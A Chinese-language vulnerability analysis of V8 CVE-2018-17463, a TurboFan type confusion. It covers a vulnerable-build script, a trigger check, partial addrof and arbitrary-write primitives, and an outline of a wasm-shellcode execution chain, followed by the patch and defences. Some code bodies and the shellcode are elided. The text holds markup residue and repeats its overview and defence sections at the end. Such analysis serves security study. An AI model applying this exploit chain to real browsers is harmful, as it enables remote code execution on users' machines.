Google V8引擎CVE-2018-17463漏洞分析与利用<\/h1>

漏洞概述<\/h2>
CVE-2018-17463是Google V8 JavaScript引擎中的一个类型混淆漏洞，源于对JSCreateObject操作的side-effect判断错误。该漏洞允许攻击者通过精心构造的JavaScript代码实现任意代码执行。<\/p>

环境搭建<\/h2>

漏洞存在于commit 52a9e67a477bdb67ca893c25c145ef5191976220之前版本，建议使用以下脚本编译修复前的V8版本：<\/p>

#!\/bin\/bash
<\/span><\/span><\/span><\/span>
<\/span><\/span>set -Eeuxo pipefail
<\/span><\/span>
<\/span><\/span>fetch v8
<\/span><\/span>pushd v8
<\/span><\/span>git checkout 568979f4d891bafec875fab20f608ff9392f4f29
<\/span><\/span>gclient sync
<\/span><\/span>.\/tools\/dev\/gm.py x64.release
<\/span><\/span>popd
<\/span><\/span><\/code><\/pre>漏洞原理分析<\/h2>
根本原因<\/h3>
漏洞位于src\/compiler\/js-operator.cc:625<\/code>，错误地将JSCreateObject<\/code>操作标记为kNoWrite<\/code>（无副作用），而实际上该操作会修改对象属性：<\/p>
#define CACHED_OP_LIST(V) \
<\/span><\/span><\/span>  V(CreateObject, Operator::kNoWrite, 1, 1) \
<\/span><\/span><\/span><\/code><\/pre>技术背景<\/h3>

TurboFan优化器<\/strong>：V8的优化编译器，使用基于图的中间表示(IR)<\/li>
Sea-of-Nodes<\/strong>：TurboFan的IR设计思想，通过控制依赖、数据依赖和操作依赖构建IR<\/li>
Effect Chain<\/strong>：记录操作副作用的依赖链<\/li>
<\/ol>
漏洞触发流程<\/h3>

JSCreateObject<\/code>被错误标记为无副作用(kNoWrite<\/code>)<\/li>
优化过程中消除冗余的类型检查节点<\/li>
导致类型混淆，最终可实现任意代码执行<\/li>
<\/ol>
漏洞利用技术<\/h2>
漏洞触发验证<\/h3>
通过以下代码可以验证漏洞存在：<\/p>
function<\/span> check_vul<\/span>(){
<\/span><\/span>    function<\/span> bad_create<\/span>(x<\/span>){
<\/span><\/span>        x<\/span>.a<\/span>;
<\/span><\/span>        Object.create<\/span>(x<\/span>);
<\/span><\/span>        return<\/span> x<\/span>.b<\/span>;
<\/span><\/span>    }
<\/span><\/span>
<\/span><\/span>    for<\/span> (let<\/span> i<\/span> =<\/span> 0<\/span>;i<\/span> <<\/span> 10000<\/span>; i<\/span>++<\/span>){
<\/span><\/span>        let<\/span> x<\/span> =<\/span> {a<\/span> :<\/span> 0x1234<\/span>};
<\/span><\/span>        x<\/span>.b<\/span> =<\/span> 0x5678<\/span>; 
<\/span><\/span>        let<\/span> res<\/span> =<\/span> bad_create<\/span>(x<\/span>);
<\/span><\/span>        if<\/span>(res<\/span> !=<\/span> 0x5678<\/span>){
<\/span><\/span>            console<\/span>.log<\/span>("CVE-2018-17463 exists in the d8"<\/span>);
<\/span><\/span>            return<\/span>;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>    throw<\/span> "bad d8 version"<\/span>;
<\/span><\/span>}
<\/span><\/span>check_vul<\/span>();
<\/span><\/span><\/code><\/pre>类型混淆实现<\/h3>

查找碰撞属性对<\/strong>：通过构造特定对象找到在Dictionary模式下会碰撞的属性对(X,Y)<\/li>
<\/ol>
function<\/span> findCollision<\/span>(){
<\/span><\/span>    let<\/span> find_obj<\/span> =<\/span> [];
<\/span><\/span>    for<\/span> (let<\/span> i<\/span> =<\/span> 0<\/span>;i<\/span><<\/span>OBJ_LEN<\/span>;i<\/span>++<\/span>){
<\/span><\/span>        find_obj<\/span>[i<\/span>] =<\/span> 'b'<\/span>+<\/span>i<\/span>;
<\/span><\/span>    }
<\/span><\/span>    eval(`
<\/span><\/span><\/span>        function bad_create(x){
<\/span><\/span><\/span>            x.a;
<\/span><\/span><\/span>            this.Object.create(x);
<\/span><\/span><\/span>            <\/span>${<\/span>find_obj<\/span>.map<\/span>((b<\/span>) => `let <\/span>${<\/span>b<\/span>}<\/span> = x.<\/span>${<\/span>b<\/span>}<\/span>;`<\/span>).join<\/span>('\n'<\/span>)}<\/span>
<\/span><\/span><\/span>            return [<\/span>${<\/span>find_obj<\/span>.join<\/span>(', '<\/span>)}<\/span>];
<\/span><\/span><\/span>        }
<\/span><\/span><\/span>    `<\/span>);
<\/span><\/span>    \/\/ ... 测试代码 ...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>
addrof原语<\/strong>：泄露任意JavaScript对象的地址<\/li>
<\/ol>
function<\/span> addrof<\/span>(obj<\/span>){
<\/span><\/span>    eval(`
<\/span><\/span><\/span>        function bad_create(o){
<\/span><\/span><\/span>            o.a;
<\/span><\/span><\/span>            this.Object.create(o);
<\/span><\/span><\/span>            return o.<\/span>${<\/span>X<\/span>}<\/span>.x1;
<\/span><\/span><\/span>        }
<\/span><\/span><\/span>    `<\/span>);
<\/span><\/span>    \/\/ ... 实现代码 ...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>
任意地址读写<\/strong>：通过修改ArrayBuffer的backing_store实现<\/li>
<\/ol>
function<\/span> arbitraryWrite<\/span>(obj<\/span>,addr<\/span>){
<\/span><\/span>    eval(`
<\/span><\/span><\/span>        function bad_create(o,value){
<\/span><\/span><\/span>            o.a;
<\/span><\/span><\/span>            this.Object.create(o);
<\/span><\/span><\/span>            let ret = o.<\/span>${<\/span>X<\/span>}<\/span>.x0.x2;
<\/span><\/span><\/span>            o.<\/span>${<\/span>X<\/span>}<\/span>.x0.x2 = value;
<\/span><\/span><\/span>            return ret;
<\/span><\/span><\/span>        }
<\/span><\/span><\/span>    `<\/span>);
<\/span><\/span>    \/\/ ... 实现代码 ...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>完整利用链<\/h3>

构造WebAssembly实例获取rwx内存区域<\/li>
使用addrof原语泄露函数地址<\/li>
通过任意地址读写修改代码内存<\/li>
写入shellcode并执行<\/li>
<\/ol>
\/\/ 1. 构造wasm实例
<\/span><\/span><\/span><\/span>var<\/span> buffer<\/span> =<\/span> new<\/span> Uint8Array<\/span>([...]);
<\/span><\/span>var<\/span> wasmImports<\/span> =<\/span> { env<\/span>:<\/span> { puts<\/span>:<\/span> function<\/span>(){} } };
<\/span><\/span>let<\/span> m<\/span> =<\/span> new<\/span> WebAssembly<\/span>.Instance<\/span>(new<\/span> WebAssembly<\/span>.Module<\/span>(buffer<\/span>),wasmImports<\/span>);
<\/span><\/span>let<\/span> f<\/span> =<\/span> m<\/span>.exports<\/span>.p4nda<\/span>;
<\/span><\/span>
<\/span><\/span>\/\/ 2. 泄露函数地址
<\/span><\/span><\/span><\/span>let<\/span> addr<\/span> =<\/span> addrof<\/span>(f<\/span>);
<\/span><\/span>
<\/span><\/span>\/\/ 3. 遍历对象结构找到rwx内存
<\/span><\/span><\/span>\/\/ JSFunction -> SharedFunctionInfo -> WasmExportedFunctionData -> WasmInstanceObject -> imported_function_targets -> rwx_area
<\/span><\/span><\/span><\/span>
<\/span><\/span>\/\/ 4. 写入shellcode并执行
<\/span><\/span><\/span><\/span>let<\/span> shellcode<\/span> =<\/span> [72<\/span>, 49<\/span>, 201<\/span>, 72<\/span>, 129<\/span>, 233<\/span>, 247<\/span>, 255<\/span>, 255<\/span>, 255<\/span>, ...];
<\/span><\/span>let<\/span> write_tmp<\/span> =<\/span> new<\/span> Uint8Array<\/span>(mem<\/span>);
<\/span><\/span>write_tmp<\/span>.set<\/span>(shellcode<\/span>);
<\/span><\/span>f<\/span>();
<\/span><\/span><\/code><\/pre>漏洞补丁<\/h2>
修复commit 52a9e67a477bdb67ca893c25c145ef5191976220将CreateObject<\/code>的标志改为kNoProperties<\/code>：<\/p>
-  V(CreateObject, Operator::kNoWrite, 1, 1)
<\/span><\/span><\/span><\/span>+  V(CreateObject, Operator::kNoProperties, 1, 1)
<\/span><\/span><\/span><\/code><\/pre>关键知识点<\/h2>

V8对象内存布局<\/strong>：FastProperties与DictionaryProperties模式的区别<\/li>
TurboFan优化过程<\/strong>：如何消除冗余的类型检查<\/li>
WebAssembly利用<\/strong>：如何通过wasm获取可执行内存区域<\/li>
地址泄露技巧<\/strong>：通过类型混淆实现对象地址泄露<\/li>
任意内存读写<\/strong>：利用ArrayBuffer的backing_store机制<\/li>
<\/ol>
防御措施<\/h2>

及时更新V8引擎版本<\/li>
启用V8的指针压缩和写保护功能<\/li>
限制WebAssembly的使用权限<\/li>
实施适当的沙箱隔离措施<\/li>
<\/ol>

Google V8引擎CVE-2018-17463漏洞分析与利用<\/h1>

漏洞概述<\/h2> CVE-2018-17463是Google V8 JavaScript引擎中的一个类型混淆漏洞，源于对JSCreateObject操作的side-effect判断错误。该漏洞允许攻击者通过精心构造的JavaScript代码实现任意代码执行。<\/p>

漏洞原理分析<\/h2>

漏洞利用技术<\/h2>

防御措施<\/h2> 及时更新V8引擎版本<\/li> 启用V8的指针压缩和写保护功能<\/li> 限制WebAssembly的使用权限<\/li> 实施适当的沙箱隔离措施<\/li> <\/ol>

漏洞概述<\/h2>
CVE-2018-17463是Google V8 JavaScript引擎中的一个类型混淆漏洞，源于对JSCreateObject操作的side-effect判断错误。该漏洞允许攻击者通过精心构造的JavaScript代码实现任意代码执行。<\/p>

防御措施<\/h2>

及时更新V8引擎版本<\/li>
启用V8的指针压缩和写保护功能<\/li>
限制WebAssembly的使用权限<\/li>
实施适当的沙箱隔离措施<\/li> <\/ol>